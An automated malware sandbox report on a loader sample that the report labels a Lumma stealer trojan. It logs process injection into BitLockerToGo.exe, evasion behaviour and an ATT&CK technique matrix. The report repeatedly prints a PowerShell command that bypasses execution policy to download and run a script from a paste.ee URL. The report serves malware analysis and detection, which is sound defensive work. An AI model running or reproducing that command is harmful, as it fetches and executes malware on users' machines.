      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: EwKKdCrEDu.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: EwKKdCrEDu.exeStatic file information: File size 16803840 > 1048576
      Source: EwKKdCrEDu.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x5f9400
      Source: EwKKdCrEDu.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x952800
      Source: EwKKdCrEDu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1691225462.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\admin\Desktop\projects\loader\Release\Loader.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1670983008.0000000001D34000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006C51000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdbGCTL source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" Jump to behavior
      Source: EwKKdCrEDu.exeStatic PE information: section name: .symtab
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006F5751 push ecx; ret 2_2_006F5764
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5491Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2390Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396Thread sleep count: 5491 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 60Thread sleep count: 2390 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep time: -10145709240540247s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5972Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006EC481 FindFirstFileExW,2_2_006EC481
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: EwKKdCrEDu.exe, 00000000.00000002.1668214597.000000000169C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
      Source: powershell.exe, 00000004.00000002.1691529805.0000000006C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 00000004.00000002.1691299710.0000000006B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E85EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006E85EE
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006EE5B2 GetProcessHeap,2_2_006EE5B2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E2076 SetUnhandledExceptionFilter,2_2_006E2076
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E85EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006E85EE
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E2185 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_006E2185
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E1F1A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006E1F1A

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi32_6692.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTR
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 5AA008Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E1000Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6F6000Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6FE000Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 700000Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 701000Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" Jump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "invoke-command -scriptblock ( [scriptblock]::create( ( invoke-webrequest -usebasicparsing -uri "https://paste.ee/d/7bwjv" ) ) )"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "invoke-command -scriptblock ( [scriptblock]::create( ( invoke-webrequest -usebasicparsing -uri "https://paste.ee/d/7bwjv" ) ) )" Jump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeQueries volume information: C:\Users\user\Desktop\EwKKdCrEDu.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\EwKKdCrEDu.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_006E1E07 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_006E1E07
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Command and Scripting Interpreter
      1
      DLL Side-Loading
      311
      Process Injection
      21
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      1
      Web Service
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      PowerShell
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      311
      Process Injection
      LSASS Memory21
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS21
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      Application Window Discovery
      SSHKeylogging14
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543863 Sample: EwKKdCrEDu.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 96 24 paste.ee 2->24 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Powershell download and execute 2->32 36 2 other signatures 2->36 9 EwKKdCrEDu.exe 7 2->9         started        signatures3 34 Connects to a pastebin service (likely for C&C) 24->34 process4 signatures5 38 Writes to foreign memory regions 9->38 40 Allocates memory in foreign processes 9->40 42 Injects a PE file into a foreign processes 9->42 12 BitLockerToGo.exe 9->12         started        process6 signatures7 44 Suspicious powershell command line found 12->44 46 Bypasses PowerShell execution policy 12->46 15 powershell.exe 15 15 12->15         started        18 cmd.exe 1 12->18         started        process8 dnsIp9 26 paste.ee 188.114.97.3, 443, 49712 CLOUDFLARENETUS European Union 15->26 20 conhost.exe 15->20         started        22 conhost.exe 18->22         started        process10

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      EwKKdCrEDu.exe21%ReversingLabsWin32.Trojan.LummaStealer
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://aka.ms/pscore6lB0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
